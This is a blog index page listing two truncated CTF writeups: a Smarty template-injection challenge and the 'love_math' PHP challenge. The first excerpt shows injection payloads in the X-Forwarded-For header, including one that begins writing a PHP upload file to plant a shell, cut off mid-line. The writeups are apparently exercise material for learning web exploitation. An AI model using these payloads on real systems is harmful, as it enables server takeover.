刘功瑞的博客
有一天你突然惊醒,发现这一切,都只不过是一场梦。
2020年09月22日
攻防世界 XCTF Web smarty Writeup(bypass_disablefunc,move_uploaded_file,smarty)
根据题目提示猜测是smarty模板注入漏洞测试如下 X-Forwarded-For:{9*9}测试发现system命令不能执行,eval不能执行,file_get_contents不能通外网,所以想上传shell就写了一个上传的php文件X-Forwarded-For:{file_put_contents('./up.php','<?php move_uploaded_file($_FILES["file"]["tm
作者:admin , 分类:CTF , 浏览:337 , 评论:0
2020年09月22日
攻防世界 XCTF Web love_math Writeup
<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
//例子 c=20-1
$content = $_GET['c
作者:admin , 分类:CTF , 浏览:334 , 评论:0
- 搜索
- 文章归档
- 友情链接
